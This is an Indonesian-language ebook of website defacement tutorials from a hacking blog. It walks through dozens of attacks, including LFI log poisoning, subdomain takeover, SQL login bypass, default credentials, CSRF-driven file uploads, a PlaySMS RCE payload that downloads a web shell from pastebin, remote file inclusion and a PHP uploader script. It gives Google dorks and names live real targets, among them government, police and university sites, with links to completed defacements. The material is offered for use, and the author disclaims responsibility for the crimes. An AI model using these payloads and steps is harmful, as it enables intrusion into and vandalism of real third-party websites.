Ok halo semuanya pada kali ini saya membuat ebook pembelajaran deface yang
tutorialnya bersumber dari https://sec.linuxploit.com dan btw sec.linuxploit.com dulunya
adalah blog XploitSec ( Blog Milik saya juga ) tapi kontennya saya pindah ke
https://sec.linuxploit.com tujuan saya membuat ini adalah agar kalian lebih mudah untuk
mempelajari deface dan mungkin jika kuota kalian lagi habis, bisa di baca ebook ini
h3h3.
Dan satu hal lagi, tutorial yang saya buat disini hanya sebatas pembelajaran, dosa dan
tindakan criminal yang di lakukan anda, bukan tanggung jawab saya.
Halo gays balik lagi ama mimin. kali ini mimin bakalan share tutorial deface metode
Remote DNS. Ok Sedikit Penjelasan Dulu.. Remote DNS Hampir mirip seperti Take
Over Error Domain
Bedanya ? Take Over Domain Mengambil website dari ip cpanel dan hanya web error
saja yang bisa di ambil, sedangkan Remote DNS mengambil website dari ip sekitaran
cpanel, web aktif kadang bisa ke ambil juga. langsung aja ke tutorial
1. Kalian Masuk Ke Cpanel Punya kalian. Setelah Itu Kalian Liat Shared ip addressnya,
copy shared ip addressnya.
2. kalian masuk ke https://dnslytics.com/ dan masukkan shared ip address cpanel kalian
di kolom search, lalu klik search
5. paste ipnya di tools reverse ip, dan lakukan reverse ip, cari web yg error atau juga
kalian bisa menambahkan web hidup ke addon domain di cpanel kalian apabila web
hidup berhasil di taruh ke addon domain kalian tggu saja beberapa menit, apabila
sudah terhubung kalian bisa buat file indexnya
Yow halo exploiter kali ini saya akan membagikan cara deface Local File Inclusion ( LFI
) upload shell dengan metode Proc/Self/Environ. ok tanpa basa basi langsung saja kita
mulai :b.
sebelumnya kalian harus memiliki target yang vulnerable terhadap serangan LFI
Dork :
inurl:".php?id=contact.php"
inurl:index.php?id=contact.php ( selanjutnya akalin sendiri :b )
Contoh : http://target.com/page.php?id=service.php
Kemudian ganti service.php dengan ../../../ lalu jika kalian mendapat error seperti :
Warning: include(../../../) [function.include]: failed to open stream: No such file or
directory in /home/gunslinger/public_html/service.php on line 99
kita harus menaikkan directory nya, bagaimana ? dengan menambahkan ../ sampai
errornya hilang. contoh : http://target.com/page.php?id=.../../../../../etc/passwd
dan jika berhasil maka akan mendapatkan file /etc/passwd seperti berikut.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
mari kita cek apakah proc/self/environ bisa di akses atau tidak dengan mengganti
etc/passwd menjadi proc/self/environ
contoh : http://target.com/page.php?id=.../../../../../proc/self/environ
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI =
/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at
www.site.com Port 80
ok ternyata proc/self/environ bisa di akses, jika anda mendapatkan blank ( halaman
putih ) berarti tidak bisa di akses.
selanjutnya mari kita injeksi dengann malicious kode dengan meracuni http-headernya .
bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox
addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi
"http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
lalu pada user-agent isikan dengan kode berikut :
atau
lalu submit.
jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat
seperti ini.
http://target.com/linuxploit.php
deface metode readme.io custom domain takeover
Yow Halo Exploiter, masih seputar takeover sebelumya saya membahas takeover
tentang shopify kali ini Readme.io cara ini mungkin sedikit lebih ribet dibandingkan
shopify. ok langsung saja.
Contoh Kasus
Apa saja syarat agar domain tersebut bisa di take over ? domain yang bisa di take over
adalah domain yang CNAME nya mengarah ke ssl.readmessl.com atau A Record nya
mengarah ke 104.18.210.56
kemudian tunggu sampai terhubung, dan btw kalian bisa otak atik dulu webnya biar
tampilan heked bay nya keren :b
Hasil : http://readme.hackerszone.top/
Mirror : https://zone-xsec.com/archive/mirror/id/13520
Yow Halo Exploiter, kali ini saya akan memberikan tutorial deface metode Shopify
Custom Domain or Subdomain Takeover. Bagi yang belum tau, shopify adalah
platform situs jual beli yang cukup populer. Dan nampaknya verifikasi di situs ini tidak
ada lagkah tambahan selain hanya menggunakan cname dan a record yang telah
ditentukan.
ping target.com
contoh :
ping shop.hackerszone.top
ping shop.hackerszone.top
disitu kalian bisa lihat, bahwa A Record nya mengarah ke 23.227.38.65 itu vuln untuk di
takeover
langsung saja kita daftar ke shopify.com KLIK INI
pake yg trial gak usah bayar, dan daftarnya biasa aja, gak perlu saya jelaskan :D
jika sudah daftar otomatis akan masuk ke dashboard web anda, kemudian klik Online
Store > Domains
setelah itu klik connect existing domain
Hasil : http://shop.hackerszone.top/
Mirror : https://zone-xsec.com/archive/mirror/id/13040
Yow Halo Exploiter, kali ini saya akan membagikan tutorial deface lagi, metode/poc
Default User dan Password CMS Mtech Websolution, btw besok sudah hari raya idul
fitri, jadi saya minta maaf kalo ada kesalahan :D, ok langsung aja.
Langkah-Langkah
4. berhubung gakbisa upload shell hanya bisa upload file .jpg .png .jpeg .bmp kalo
kalian mau nyelipin backdoor di jpg juga bisa :D, tapi disini saya akan ke menu kategori
dan edit-edit :D
ok segitu saja yg bisa saya sampaikan
semoga artikel ini bermanfaat bagi kalian :D
Langkah-Langkah
1. dorking terlebih dahulu, atau gunakan live target di atas
5 jika sudah, buka csrf kalian di browser dan upload script deface kalian.
6. jika muncul tanda seperti awal ( liat nomor 2 ), berarti sukses ter upload, lalu akses
hasil deface kalian : http://target.com/wp-content/jssor-slider/jssor-
uploads/ScDefaceKamu.html
Contoh : http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/0wn.htm
7. dan boom !!
Ok itu saja yg bisa saya sampaikan, jangan lupa juga untuk melihat tutorial deface
lainnya
semoga bermanfaat dan jangan lupa untuk share artikel ini :D
#Google Dork :
- intext:"Created By: Worldviewer.in."
#Admin Login :
/admin
#User&Password :
'=''or'
Ok halo exploiter, kali ini saya akan membagikan tutorial deface PlaySMS
Unauthenticated RCE Upload Shell, sudah lama ya gak buat tutorial deface lagi :v.
metode deface ini sangat simpel, tanpa basa basi langsung saja ok.
# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE :
- {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
Langkah-Langkah Exploitasi
Setelah itu terserah kalian mau di tebas atau titip file doang.
sekian dari saya, semoga bermanfaat
#Google Dork:
intitle:"Temp File Hosting"
#Live Target :
https://uguu.jgleba.com
2. saat kalian akses webnya, bakalan muncul tempat upload file, nah kalian bisa upload
script deface kalian
3. setelah di upload kalian tinggal klik aja link dibawahnya
4. And Boom
Ok Itu saja yang bisa saya sampaikan.
stay at home, stay underground & stay safe, bantu putuskan rantai penyebaran covid-
19 di indonesia.
and keep exploiting
#No_iDeNtiTy
#Google Dork :
- intext:"Powered By Shop737" ( Kembangkan Lagi Soalnya Targetnya Udh dikit )
#Exploit : /poto/upload.php
1. Kalian cari target dlu dengan dork diatas, kemudian masukkan exploitnya
target.com/poto/upload.php
jika dimintain user&pass masukkan saja admin & admin
lihat gambar :
*contoh : cctv-surabaya.com/poto/-/shell.php.xxxjpg
lihat gambar :
jangan lupa , masukkan passwordnya :D
Doorr ..
XSS Vulnerability
#Google Dork :
- Powered by SHODH TECHNOLOGIES ( Kembangin Lagi )
#Admin Login :
- /admin
- /web-admin
#User : \
#Pass : ||1#
#Live Target : http://tanahlaut.kalsel.polri.go.id/polres/
2. cek admin loginnya /admin atau /web-admin. di web itu admin loginnya /admin
6. and boom
#Google Dork :
- inurl:/index.php/en/147/featured
#Exploit :
- /index.php/frontend/login
#Live Target :
https://www.dev.kamaroto.co.id/
1. pertama dorking dlu atau kalian bisa gunakan live target diatas.
4. setelah register. cek email yg kalian gunakan daftar tdi soalnya kalian harus verifikasi
email dlu.
5. setelah di verifikasi, kemudian login dengan akun yg sudah kalian buat tadi.
6. setelah itu klik menu My Profile dan klik add files, kalian upload sc deface ext .txt
7. cara akses ? kalian klik & tahan nama filenya atau akses sperti ini
target.com/files/namafile.txt
contoh : https://www.dev.kamaroto.co.id/files/0d3d316b0c.txt
8. and boom
Ok Sekian Dari Saya Terimakasih
#No_iDeNtiTy
Hola Exploiter !! kali ini saya akan share Tutorial WordPress Plugin WP with Spritz 1.0 -
Remote File Inclusion, Sebelumnya kalian bisa baca apa itu Remote File
Inclusion Disini.
Bahan - Bahan
- Dork : inurl:/wp-content/plugins/wp-with-spritz/
Pertama - tama kalian bisa Dorking menggunakan Dork diatas atau menggunakan Live
Target di bawah.
Live Target : http://179.1.14.143/
Selanjutnya masukkan exploit nya
Contoh : http://179.1.14.143/wp-content/plugins/wp-with-
spritz/wp.spritz.content.filter.php?url=https://pastebin.com/raw/EStDfMy3
Halo Exploiter.. kali ini saya akan membagikan tutorial deface lagi sesuai judul :v.
Deface exploit responsive prestashop 1.6 arbitary file upload.
#Google Dork :
inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"
inurl:"/modules/homepageadvertise/"
#CSRF : KLIK ME
#Exploit : /uploadimage.php
#Live Target : http://www.sfcosmetics.it/modules/homepageadvertise/
4. masukkan webtarget beserta exploit pada csrf dan postfile kalian isi usefile. dan klik
titeni target.
5. setelah itu kalian upload shell extensi .gif berhubung target yg saya kasih tidak bisa
upload shell jdi upload script deface saja.
8. dan boom
Hallo Exploiter !1!1 kali ini saya akan membagikan tutorial deface simpel, wp themes
sportimo !. yak btw saya biasanya upload artikelnya pagi hari, tp skrg malam krena pagi
gabisa nulis sibuk kerja wkwk :p
#Google Dork :
- inurl:/wp-content/themes/sportimo-theme/
- index of /wp-content/themes/sportimo-theme/
#Exploit : /wp-content/themes/sportimo-theme/functions/upload-handler.php
#Csrf : KLIK ME !!
#Live Target : http://ichd.ma
4. lngsung upload shell ext .php5 tp karena live target gbisa upshell saya up sc deface
aja :)
5. apabila saat upload muncul nama sc deface kalian, berarti vuln ( readme.html nama
sc saya )
7. and boom
Sekian dari saya
#No_IDentiTy
Halo exploiter, kali ini saya akan membagikan tutorial deface metode Silentum Uploader
Vulnerability, metode ini sangat simpel. ok langsung aja
#Google Dork :
- inurl:upload.php intext:"htm html"
- inurl:upload.php intext:"powered by silentum"
halo exploiter, kali ini saya akan membagikan tutorial deface lagi, yaitu Exploit Bugzilla
proof of concept ini sebenarnya udah lama, ya mirip2 sperti registrasi member, ok
langsung aja sob.
#Google Dork :
- inurl:bugzilla intext:attachment.cgi?id=
- bugzilla intext:attachment.cgi?id= site: (masukkan domain site tujuan)
- inurl:attachment.cgi?id= intext:New Account
- inurl:attachment.cgi?id= intext:New Account site: (masukkan domain site tujuan)
- inurl:bugzilla intext:New Account
- inurl:bugzilla intext:New Account site: (masukkan domain site tujuan)
- inurl:bugzilla intext:New Account site:com (contoh domainnya site tujuan com)
2. jika tampilan web sperti ini, berarti vuln, dan klik menu New Account
3. jika sudah, tambahkan alamat email kalian yg aktif
dan klik send
4. jika sudah cek email kalian, krena link verifikasi dikirim ke email kalian. jika linknya
sudah masuk ke email klian, klik link yang panjang itu sob :v
5. jika sudah klian klik, kalian akan diarahkan ke sini ( liat gambar dibawah ) isi nama
dan password kalian, dan klik create
8. jika klian sudah mengklik salah satu bug, kalian isi semua kolom, dan pada bagian
attachment klik add attachment dan masukkan sc deface kalian ext .html jangan lupa isi
description
dan klik submit bug
9. jika kalian cri nama file kalian, dan klik ( hackd itu nama file saya )
halo whats up exploiter, kali ini saya akan share tutorial deface metode wp easy
comment upload plugin, metode ini sangat mudah, ok langsung aja.
#Google dork :
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
#Exploit :
- /wp-content/plugins/easy-comment-uploads/upload-form.php
#Live Target :
- http://www.blog.escasto.ipn.mx/
- https://www.fairyhouses.com/
Hasil Saya :
- https://www.fairyhouses.com/wp-content/uploads/2020/03/lix.txt
- http://www.blog.escasto.ipn.mx/wp-content/uploads/2020/03/lix.txt
Halo exploiter, pada artikel ini saya akan memberikan tutorial deface metode Xampp
localwrite access, sebenarnya ini exploit udh lama, ya mirip2 kyk priv8 scr hasilnya :v.
ok langsung aja ya.
#Google Dork :
inurl:/xampp/lang.php
inurl:/security/lang.php
#Exploit :
/lang.php?Hacked_By_NamaLu
#Live Target :
https://www.umpwr.ac.id/xampp/lang.php
http://vega-apache.ingeneo.co/security/lang.php
halo exploiter. kali ini saya akan membagikan tutorial deface metode Priv8 SCR, ini
sebenarnya metode lama dan metode ini sangat simpel, ok langsung aja
halo exploiter, pada artikel kali ini, saya akan memberikan tutorial deface exploit joomla
com_djclassifieds upload shell, ok langsung aja
4. langsung saja buka csrfnya link sudah saya taruh tadi diatas, sbelumnya kalian edit
terlebih dahulu dibagian action=" truh link targetmu beserta exploitnya, dan dibagian
value=" isi nama shell yg akan kalian upload, shellnya hrus berextensi .phtml
5. kalau sudah kalian buka csrfnya di browser kalian dan upload shell kalian
6. jika sudah selesai di upload muncul tanda sperti ini lagi, berarti shell sukses
terupload.
7. langsung aja akses shellnya,
target.com/tmp/djupload/namashell.phtml
dan boommm..
1. Kalian Dorking Terlebih Dahulu.. Jika Sudah Menemukan Webnya Langsung Login
Dengan Default User & Passnya..
2. Jika Berhasil Maka Kamu Akan Masuk dashboard admin
3. Setelah Itu Terserah kalian mau diapakan Use your brain bro !
Untuk file uploadernya gunakan script dibawah ini, buat file baru > copy paste
uploadernya > dan simpan dengan nama bebas dengan format file gif. Contoh nya
menjadi uploader.gif.
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }
Lalu kalian buat sc depes sendiri, aku sarankan jangan yang ribet dan juga tidak berat
bisa juga kalian gunakan metode jso, jika pas upload script tetapi sehabis itu error (403)
kurangi banyak kodingan nya, untuk yang saya pakai hanya sebesar 1kb saja gan, jika
ingin di tiru silahkan kalian copy paste > simpan
Itu saja yang perlu disiapkan. Untuk shell php ( raw file ) bisa didapat dari github atau di
mana saja buat sendiri juga bisa, bapac kau juga bisa Sekarang cari targetnya dengan
menggunakan dork diatas. Lalu daftar dulu di LMS nya, ganti url target nya seperti
contoh dibawah ini :
Url : https://target.com/chamilo
https://target.com/chamilo/main/auth/inscription.php
Url : https://target.com https://target.com/main/auth/inscription.php
Upload file uploader ( File gif ) yang tadi sudah di buat. Lalu rename filenya dan ubah
formatnya menjadi php5 atau php7. Semisal nama filenya uploader.gif ubah
menjadi uploader.php5.
Lokasi file nya dapat di lihat di informasi file nya:
Buka File Uploadernya, pilih file deface. File deface akan di upload di direktori yang
sama denga file uploadernya. Contoh :
-jika bingung- Jika kalian bingung dengan cara di atas. Kalian bisa memakai shell Alfa.
Tambahkan parameter pada file uploadernya. Sehingga urlnya menjadi.
Url:http://target.com/[path]/uploader.php5?url=https://github.com/backdoorhub/shell-
backdoor-list/blob/master/shell/php/alfa.php
done
Halo Sobat Xploit !! Kali Ini Mimin Bakalan Share Tutorial deface dengan metode
Stored XSS.. Ok Langsung Saja !!
payload xss :
- <script>alert(xss by);</script>
- <script>prompt(document.domain)</script>
Dork :
- Inurl:/guestbook-add.html
- inurl:/guestbook.html ( Kembangkan lagi Ya :D )
Dorking Dulu !!
1. isi data asal-asalan kecuali bagian pesan dan captcha, di bagian pesan klian bisa isi
dengan payload xss atau juga script jso, lihat contoh gambar ini :
2. Jika Sudah langsung kalian kirim, kalian bisa cek apa sudah terstored xss dengan
cara http://webnya.com/guestbook.html
3. done
* DORK
* EXPLOIT
https://tools.xploitsecid.or.id/Defacer/Auto-balitbang
https://tools.xploitsecid.or.id/Defacer/Crack-balitbang (UTK CRACK PASSWORD NYA
NANTI)
2. CARI WEB NYA, SETELAH DPT WEB NYA, LANGSUNG MASUKIN EXPLOIT NYA
CONTOH : webtarget.sch.id/users/listmemberall.php
NB: SEBELUM MASUKIN EXPLOIT NYA, CEK DULU ADLOG NYA, CARA NYA
TINGGAL NAMBAHIN KATA admin
CONTOH: webtarget.sch.id/admin
2} Terus pilih Web nya dan cari yang vuln bypass sql login dan isi username dan
password dengan ' or 1=1 limit 1 -- -+
Monggo di eksekusi;)
2. Scirpt jso, kalau kalian ga punya scirpt jso bisa liat tutor di blog saya :)
https://4destat3rsakiti.blogspot.com/2019/09/assalamualaikum-wr-wb-di-
kesempatan.html?m=1
Oke kalean Ngedork dlu pake dork di atas mamank...Dan Pilih Menu hubungi dibagian
atas. Maka tampilannya akan berubah seperti di bawah ini.
#next
kalian isi scirpt jso kalian di bagian pesan , contoh pada gambar di bawah.
!peringatan!
Deface seperti ini gampang ketikung..jdi klo ke tikung ikhlas ne wae:v
Ok Sekian tutor dari saya bila ada salahnya mohon mapp sebesar-besarnya ..
Wassmualaikum wr wb.
Hallo Balik Lagi Ama mimin disini :).. kali ini mimin bakalan share tutorial deface
metode Default Username & Pass CMS SalatigaWeb Ok Sebelum Ke tutorial
jangan lupa Follow Instagram Mimin dulu : @youebay_ ntar di follback kok :)
username: masagung
password: jhunk1990
Step By Step :
1. Dorking Dulu.. Kalo Udah Pilih Salah Satu Web Dan Cek Admin Loginnya dengan
cara targetmu.com/timeline login Dengan Username & Password Diatas ( Pilih Salah
Satunya )
2. Kalo Vuln Nanti Bakal Masuk Ke Dashboard Admin.. Kalo Udah Masuk.. Tau Kan
Mau di apakan Webnya ??
Note : Upshell Berada Di Laman Identitas Website
Ok Segitu Aja Yang Bisa mimin sampaikan :).. kurang lebih mohon maaf.. good bye N
See u next Time :*
OK Gays.. Balik Lagi Ama Admin Disini :D.. Kali Ini Mimin bakalan share tutorial
deface metode SQL Lokomedia Dengan Tools AutoXploit.. Ok Langsung Aja Ya..
Sebelumnya Jangan Lupa Untuk Follow Instagram Mimin Ya : @youebay_ Ntar Di
follback kok :)
Tutorial :
3. Buka Link Tools Di Atas.. Dan Pilih Tools Lokomedia AutoXploit Dan Masukkan Link
Target Kalian Dan Klik Start..
4. Jika Vuln Maka Akan Muncul Username Dan Password Web Tersebut.. Kalian Hash
Passnya Dan Cari Admin Login.. Kalo Sudah Login Tau Kan Mau Klian Apakan ??
Heheh
Bahan-Bahan :
- Hp/pc
- Script deface
- shell backdoor ( kalo ga punya lu download :v )
- jaringan internet
- dork : inurl:/admin/login.php intext:username
inurl:/admin/index.php
inurl:/admin_login intitle:login
Kalian Kembangin lg dorknya geh.. gbisa ngembangin dork ? cek artikel ini KLIK SINI
BUJANKK
1. Dorking dulu lah bujankk.. tp seperti biasanya gw selalu nyiapin live target buat kalian
smua :v.. nih gw ksih http://www.veenayogakendra.com/admin/ , kalo udh msuk klian
lngsung login dengan username & password ini '=''or'
2. nah kalo vuln klian bakalan bisa msuk webnya.. klian cari lah tempat upload apa kek..
disitu ada tempat upload di bgian gallery..
3. Kalo Udh Klian Tinggal upload shell bujank.. kek gini.. dan klik add photo..
4. Kalo udh.. klian klik + tahan gambar pecah itu dan buka di tab baru
5. Kalo Dah Msuk Ke shell klian.. Klian Tinggal Upload Sc dipes aja :v.. soalnya webnya
g bisa di tebas :v..
6. Kalo dah.. klian Tinggal pnggil sc depes klian :v.. contoh
http://site.com/admin/gallery/namasc.html / php
1. Hp/Pc
2. Jaringan Internet
3. Script Jso
4. Dork : Inurl:/Kontribtor
6. dan booomm.. ter depes layaknya hekel plo :v.. ni klo mau liat web hsil dipes
gw http://beranda.tolitolikab.go.id/berita/detail/youe-ganss
Halo Gays Balik Lagi Ama Gw Youe Kali Ini Gw Bakal Ksih Tutorial Deface Metode
Regmem Ya.. Ok langsung aja Ke Tutornya..
Bahan-Bahan:
1. Hp/Pc
2. Jaringan Internet
3. Sc Deface extensi php.pjpeg ( tinggal Ubah nama aja cok )
4. Dork : Inurl:/register
Inurl:/member.php (kembangin lagi dorknya)
step by step :
1. dorking dulu lah pake dork diatas.. tp disini gw ada live target.. ini dia
: https://puspadeli.deliserdangkab.go.id langsung aja msuk web nya.. klo udh
msuk klian klik register.. dan isi datanya.. boleh ngasal.. tp email hrus email aktif..
kalo udh klik registrasi.. nnti klian bakalan dikirim verifikasi email..
2.kalo udh langsung login aja pake username ama pass yg lu buat tadi
3. kalo udh login langsung aja klik kolom buat pengaduan..
4. Kalian Isi ngasal aja.. dan di bagian foto.. msukkan sc deface klian yg ber
extensi .php.pjpeg ingatt bukan ext html.. nama sc gw wht.php.pjpeg .. kalian isi
dua kolom foto itu dengan sc deface klian.. kalo udh langsung aja klik proses..
5. kalo udh langsung akses aja hsil deface klian.. cara akses
?? https://puspadeli.deliserdangkab.go.id/photo/namasc.php.pjpeg
Alat/bahan
1.Dork
2.Exploit
3.Csrf onlen
4.Hp
47
5.Internet
6.browser
Step by step .
1.Dorking di google
Dork : inurl:/themes/zicepanel/ klo udh.. tinggal kalian pilih aja web yg menurut klian
vuln :v
Semoga bermanfaat ya :)
Bahan :
- Hp/pc
- Dork : inurl:/wp-content/themes/cameleon
- CSRF Exploiter Klik Disini Bujank
- exploit : /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
- jaringan internet
- kesabaran :v
- live target http://jhdlaw.com
Step By Step :
3. nah kalo sudah masuk webnya.. kalian masukkan exploit yg diatas di akhir domain
web tersebut.. contoh http://website.com/wp-
content/themes/cameleon/includes/fileuploader/upload_handler.php
jika muncul tulian "error no were file upload" berarti web itu vuln.. kek gini :v
4. Kalian Langsung Buka Csrf exploiternya ( link diatas td ) dan kalian copy web target
kalian dan paste di bagian url target.. dan Post File kalian tulis aja qqfile kek gini
5. nah kalo udh kalian pilih sc deface yang mau kalian upload.. kalo udah langsung aja
klik upload.. Like This N00b :v
Bahan-bahan:
- Hp/Pc
- Jaringan Internet
- Sc deface berbentuk txt
- exploit : admin/modules/bibliography/pop_attach.php
- kesabaran :v
- dork : - pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- Live target: http://pustaka.pa-boyolali.go.id/
step by step :
4. Nahk Kalo Sudah Kalian masukkan Masukkan Sc Deface txt kalian, klik tulisan
browse dan pilih sc deface yg mau klian msukkan, dan isi judulnya sesuai nama sc
deface kalian.. disini sc deface saya namanya 707.txt berarti judulnya akan saya isi
707.txt juga.. dan klik tombol unggah sekarang..
5. Dan Taraaa.. berhasil terupload.. cara manggilnya ? contoh :
http://tolol.com/repository/NamaScKalian.txt
Terimakasih Bagi Yang sudah mampir.. cukup mudah bukan ??.. maaf apabila ada
salah kata ya.. kurang lebihnya mohon dimaklumkan :)..
- Hp/pc
- Sc Deface
- Jaringan Internet
- Nyawa :v
- Dork : - Kawaii File Host
- Kawaii File Hosting ( pilih salah satu :v )
2. Kalo udah Klik Select Drop File Dan Pilih Sc Deface Kalian
3. Kalo Udh Ter upload Tinggal Klik Link Yg Muncul Di bawah Tombol Upload
Tadi..
cukup Simpel Ya.. Terimakasih Sudah Mampir Di Blog Saya :D.. Semoga Bermanfaat..
mohon maaf apabila ada yg kurang :D.. Byeeeee...
My Youtube Channel
Klik Disini :D
Team : XploitSec
Komunitas : LinuXploit